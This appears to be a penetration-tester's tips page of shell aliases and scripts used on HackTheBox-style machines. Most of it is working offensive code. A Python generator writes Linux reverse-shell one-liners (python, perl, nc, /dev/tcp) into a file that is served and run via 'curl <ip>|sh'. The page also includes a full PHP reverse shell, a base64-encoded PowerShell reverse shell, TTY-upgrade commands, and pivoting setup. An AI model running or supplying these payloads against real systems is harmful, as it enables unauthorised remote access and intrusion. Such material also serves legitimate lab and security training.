Tips and tricks
Tmux
tmux is a terminal multiplexer. It lets you switch easily between several programs in one terminal, detach them (they keep running in the background) and reattach them to a different terminal.

Revshells.com
Generate reverse shells for all platforms
Make use of aliases and examples
You will be 100x more efficient by using aliases for commands you use a lot. I got most of the aliases below from https://github.com/jazzpizazz/zsh-aliases.
List IP's
list_ips() {
    # Print every global-scope IPv4 address, one per line, tagged with the
    # interface it belongs to (interface name in cyan, e.g. "[tun0] 10.10.14.166").
    # Interface header lines look like "2: eth0: <...>", so the colon is stripped
    # from field 2 to get the bare name; "inet" lines carry "addr/prefix" in field 2.
    ip a show scope global | awk '
        /^[0-9]+:/ { sub(/:/, "", $2); iface = $2 }
        /^[[:space:]]*inet / {
            split($2, a, "/")
            print "[\033[96m" iface "\033[0m] " a[1]
        }
    '
}
Make directory and CD into it
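mkdir_cd() {
    # Create a directory and change into it.
    # The argument is quoted: the original used an unquoted $1 and then `cd $_`,
    # so a name containing spaces or glob characters was word-split and could
    # create several directories and cd into the last one.
    mkdir "$1" && cd "$1"
}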
Setup webserver
# Print the local addresses, list the working directory, then serve that
# directory over plain HTTP on every interface, port 80 (hence sudo).
# ls_pwd is not defined on this page; the sample output below shows it printing
# the working directory in brackets followed by its listing.
alias www="list_ips && ls_pwd && sudo python3 -m http.server 80"
┌──(kali㉿kali)-[~/htb/Visual]
└─$ www
[eth0] 192.168.146.129
[eth1] 192.168.178.119
[eth2] 10.10.1.130
[tun0] 10.10.14.166
[/home/kali/htb/Visual]
app.git custom hash nc64.exe rce rce.git test.git tmp winPEAS.bat winPEAS.ps1 xx
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [02/Oct/2023 05:52:25] "GET /winPEAS.bat HTTP/1.1" 200 -
Default nmap scan
This function scans a target and stores the output.
nmap_default () {
    # TCP scan with default scripts and version detection (-sCV); results are
    # written with -oA as nmap/tcp_default.{nmap,gnmap,xml} under the current
    # directory. Usage: nmap_default ip (options); extra arguments are passed
    # to nmap unchanged.
    if [ $# -eq 0 ]; then
        echo "[i] Usage: nmap_default ip (options)"
        return
    fi
    # Create the output directory on first use.
    if [ ! -d "./nmap" ]; then
        echo "[i] Creating $(pwd)/nmap..."
        mkdir nmap
    fi
    sudo nmap -sCV -T4 --min-rate 10000 "${@}" -v -oA nmap/tcp_default
}
Nmap UDP
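nmap_udp () {
    # UDP scan with default scripts and version detection (-sUCV); results are
    # written with -oA as nmap/udp_default.{nmap,gnmap,xml} under the current
    # directory. Usage: nmap_udp ip (options); extra arguments are passed to
    # nmap unchanged.
    if [ $# -eq 0 ]
    then
        echo "[i] Usage: nmap_udp ip (options)"
    else
        # Create the output directory on first use.
        [ ! -d "./nmap" ] && echo "[i] Creating $(pwd)/nmap..." && mkdir nmap
        sudo nmap -sUCV -T4 --min-rate 10000 "${@}" -v -oA nmap/udp_default
    fi
}
# The closing brace above was missing in the original listing, so the
# definition never terminated when pasted into a shell.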
Generate linux reverse shells into index.html
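#!/usr/bin/env python
"""Write index.html holding a shell script that tries several reverse-shell
one-liners in turn, each pointed at the listener given on the command line.

Usage: gen_lin_rev ip port

Every ``x.x.x.x`` in the template below becomes argv[1] and every ``yyyy``
becomes argv[2]; the rest of the template is written out unchanged, with a
``#! /bin/sh`` header so the file can be piped straight to sh.

The original listing had lost its indentation (the usage branch and the
file write were not indented), so it did not parse; this version also uses
``sys.exit`` instead of the ``site``-provided ``exit`` builtin.
"""
import os
import sys

payload = '''
if command -v python > /dev/null 2>&1; then
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("x.x.x.x",yyyy)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
exit;
fi
if command -v perl > /dev/null 2>&1; then
perl -e 'use Socket;$i="x.x.x.x";$p=yyyy;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
exit;
fi
if command -v nc > /dev/null 2>&1; then
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x yyyy >/tmp/f
exit;
fi
if command -v sh > /dev/null 2>&1; then
/bin/sh -i >& /dev/tcp/x.x.x.x/yyyy 0>&1
exit;
fi
'''

if len(sys.argv) < 3:
    print("[?] Usage gen_lin_rev ip port")
    sys.exit(1)

ip, port = sys.argv[1], sys.argv[2]
# The port placeholder is substituted verbatim into the template, so reject
# anything that is not a valid TCP port before writing the file.
if not port.isdigit() or not 0 < int(port) < 65536:
    print("[?] port must be a number between 1 and 65535")
    sys.exit(1)

# Plain substring replacement: the two placeholders do not occur anywhere else
# in the template.
payload = payload.replace("x.x.x.x", ip).replace("yyyy", port)
with open("index.html", "w") as f:
    f.write("#! /bin/sh\n\n" + payload)
print(f"[+] Wrote Linux reverse shells to {os.getcwd()}/index.html")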
I always combine this with Setup webserver to get an EZ reverse shell on Linux machines:
curl <kali_ip>|sh
This pipes index.html to sh and executes all of the reverse shell possibilities.
Generate PHP reverse shell
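#!/usr/bin/env python
"""Write rev.php: the PHP reverse-shell template below with the listener
address and port filled in from the command line.

Usage: <this script> ip port

Every ``x.x.x.x`` in the template becomes argv[1] and every ``yyyy`` becomes
argv[2]; the template is otherwise written out unchanged.

The original listing had lost its indentation, so it did not parse, and its
usage line said ``gen_lin_rev`` (copied from the Linux generator); the usage
line now reports the script's own name via ``sys.argv[0]``.
"""
import os
import sys

payload = '''\
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'x.x.x.x';
$port = yyyy;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>'''

if len(sys.argv) < 3:
    print(f"[?] Usage {sys.argv[0]} ip port")
    sys.exit(1)

ip, port = sys.argv[1], sys.argv[2]
# The port placeholder becomes a bare PHP integer literal, so reject anything
# that is not a valid TCP port before writing the file.
if not port.isdigit() or not 0 < int(port) < 65536:
    print("[?] port must be a number between 1 and 65535")
    sys.exit(1)

# Plain substring replacement: the two placeholders do not occur anywhere else
# in the template.
payload = payload.replace("x.x.x.x", ip).replace("yyyy", port)
with open("rev.php", "w") as f:
    f.write(payload)
print(f"[+] Wrote PHP reverse shell to {os.getcwd()}/rev.php")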
Generate PowerShell reverse shell
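gen_ps_rev () {
    # Fill the PowerShell template in ~/zsh-aliases/shells/ps_rev.txt with the
    # listener ip/port, encode it the way `powershell -ec` expects (UTF-16LE,
    # base64, no line wrapping) and put the resulting command line on the
    # clipboard. Usage: gen_ps_rev ip port
    if [ "$#" -ne 2 ]; then
        echo "[i] Usage: gen_ps_rev ip port"
        return
    fi
    # The original stored the result in SHELL, clobbering the session's $SHELL
    # for every later command; a local lowercase name avoids that. sed reads
    # the file directly (no cat) and both substitutions are quoted so the
    # arguments are not word-split.
    local encoded
    encoded=$(sed -e "s/x.x.x.x/$1/g" -e "s/yyyy/$2/g" ~/zsh-aliases/shells/ps_rev.txt \
        | iconv -f utf8 -t utf16le | base64 -w 0)
    echo "powershell -ec $encoded" | xclip -sel clip
}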
# Template read by gen_ps_rev: x.x.x.x and yyyy are replaced by sed before the
# script is UTF-16LE/base64 encoded for `powershell -ec`.
$TargetHost = "x.x.x.x";
$TargetPort = yyyy;
# Program whose stdin/stdout are bridged to the socket below.
$CommandExec = "powershell"
$CommandArgs = ""
# With Stop, any cmdlet error falls through to the catch block.
$ErrorActionPreference = "Stop";
try{
$Client = New-Object System.Net.Sockets.TcpClient;
$Client.Connect($TargetHost, $TargetPort);
$Stream = $Client.GetStream();
# Goes to the local host's output, not to the socket.
Write-Output "Connected!"
$Process = New-Object System.Diagnostics.Process;
$Process.StartInfo.FileName = $CommandExec
$Process.StartInfo.Arguments = $CommandArgs
# Only stdout and stdin are redirected; the child's stderr is not forwarded.
$Process.StartInfo.RedirectStandardOutput = $true;
$Process.StartInfo.RedirectStandardInput = $true;
$Process.StartInfo.UseShellExecute = $false;
$Process.Start() | Out-Null;
$CharBuf = New-Object Char[] 65536;
$ByteBuf = New-Object Byte[] 65536;
# Each helper starts one asynchronous read; the loop waits on whichever
# completes first. ReadStream requests at most 65530 bytes, leaving room in
# $ByteBuf for the single-byte reads done after it.
Function ReadStream{ $Stream.ReadAsync($ByteBuf, 0 ,65530) }
Function ReadStdout{ $Process.StandardOutput.ReadAsync($CharBuf, 0, 65535) }
$T1 = ReadStream
$T2 = ReadStdout
while($true){
# WaitAny returns 0 when the socket read finished, 1 when the stdout read did.
$T = [System.Threading.Tasks.Task]::WaitAny($T1, $T2)
if($T -eq 0){
# A zero-length read means the peer closed the connection.
if(($N = $T1.Result) -eq 0){ throw "Socket EOF."; }
# Keep reading one byte at a time while the last byte has its high bit set —
# presumably to avoid splitting a multibyte UTF-8 sequence; TODO confirm.
while($ByteBuf[$($N-1)] -band 0x80){
if($Stream.Read($ByteBuf, $N++, 1) -eq 0){
throw "Socket EOF."
}
}
# Decode the received bytes and feed them to the child's stdin, then re-arm the socket read.
$String = [System.Text.Encoding]::UTF8.GetString($ByteBuf[0..$($N-1)])
$Process.StandardInput.Write($String);
$T1 = ReadStream
}else{
# Child stdout: encode the chars as UTF-8, send them, then re-arm the stdout read.
if(($N = $T2.Result) -eq 0){ throw "Process EOF."; }
$Bytes = [System.Text.Encoding]::UTF8.GetBytes($CharBuf, 0, $N)
$Stream.Write($Bytes, 0, $Bytes.Count);
$T2 = ReadStdout
}
}
}catch{
Write-Output $_.ToString()
}finally{
# Always close the socket and kill the child, ignoring errors if either is already gone.
Write-Output "Shutting down."
try{ $Client.Close() }catch{ }
try{ $Process.Kill() }catch{ }
}
Upgrade shells
py_tty_upgrade () {
    # Put a pty-spawn one-liner (unversioned `python`) on the clipboard.
    # The here-string ends with a newline, exactly as the echo did.
    xclip -sel clip <<< "python -c 'import pty;pty.spawn(\"/bin/bash\")'"
}
py3_tty_upgrade () {
    # Same as py_tty_upgrade but invoking `python3` explicitly.
    # The here-string ends with a newline, exactly as the echo did.
    xclip -sel clip <<< "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
}
# Put a `script`-based tty upgrade one-liner on the clipboard.
alias script_tty_upgrade="echo '/usr/bin/script -qc /bin/bash /dev/null'| xclip -sel clip"
# Set the local terminal to raw mode without echo, foreground the backgrounded
# job, then reset the terminal.
alias tty_fix="stty raw -echo; fg; reset"
# Turn the first line of `stty -a` (speed/rows/columns) into an
# `stty rows N columns M` command and copy it to the clipboard.
alias tty_conf="stty -a | sed 's/;//g' | head -n 1 | sed 's/.*baud /stty /g;s/line.*//g' | xclip -sel clip"
Pwncat
Starts pwncat in its virtualenv and listens on port 1337
# Activate the pwncat virtualenv, then listen on all interfaces, port 1337.
# The two commands are joined with ';', so pwncat-cs still runs even if the
# activate script fails.
alias pwncat='source /home/kali/pwncat-env/bin/activate;pwncat-cs 0.0.0.0:1337'
Setup Ligolo
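#!/usr/bin/env python
"""Bring up the ligolo tun interface, add a route through it, then start the proxy.

Usage: <this script> route

The route (argv[1]) is passed to ``ip route add`` as a single argv element via
subprocess, so it is never interpreted by a shell. The original built the
command with ``os.system`` and an f-string, and wrapped it in a try/except
that ``os.system`` can never trigger (it returns the exit status instead of
raising), so a failed ``ip route add`` was still reported as a success.
Exit statuses are now checked.
"""
import subprocess
import sys

if len(sys.argv) < 2:
    print(f"[?] Usage {sys.argv[0]} route")
    sys.exit(1)

# Creating and bringing up the tun device is best-effort, as before: both
# steps fail harmlessly when the interface already exists, and their stderr
# is discarded just like the original's 2>/dev/null.
for cmd in (
    ["sudo", "ip", "tuntap", "add", "user", "root", "mode", "tun", "ligolo"],
    ["sudo", "ip", "link", "set", "ligolo", "up"],
):
    subprocess.run(cmd, stderr=subprocess.DEVNULL, check=False)

route = sys.argv[1]
result = subprocess.run(["sudo", "ip", "route", "add", route, "dev", "ligolo"], check=False)
if result.returncode != 0:
    print("[!] Error in adding route")
    sys.exit(1)
print(f"[+] Successfully added {route} as route")

# Listener on all interfaces, port 443, with a self-signed certificate.
subprocess.run(["sudo", "proxy", "-laddr", "0.0.0.0:443", "-selfcert"], check=False)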
Fuzz directories
#!/bin/bash
# Crawl a web root with feroxbuster and save the discovered paths to
# dirs_and_files.txt in the current directory.
# Usage: <script> <url>

# An empty or missing URL is a usage error (-z also rejects an explicit "").
[[ -z "$1" ]] && { echo "Usage: $0 <url>"; exit 1; }

url=$1
feroxbuster -u "$url" -q --output dirs_and_files.txt
Fuzz vhosts
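#!/bin/bash
# Enumerate virtual hosts with ffuf: each wordlist entry is tried as the
# FUZZ subdomain in the Host header of a request to http://<domain>.
# -ac auto-calibrates the filters so the default vhost's response is dropped.
# Usage: <script> <domain>

# Check if the domain argument is provided
if [ -z "$1" ]; then
echo "Usage: $0 <domain>"
exit 1
fi

# Assign the domain to a variable
domain="$1"

# Run ffuf. The URL is quoted as well as the header: the original left
# $domain bare in -u, so it was subject to word splitting and globbing.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.$domain" -u "http://$domain" -ac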
Write your own scripts
For most things there will be an open source tool, but these tools often come with far more functionality than is actually needed. So write your own tools to avoid noise on the target. You will also be a lot more efficient if you have your own toolset.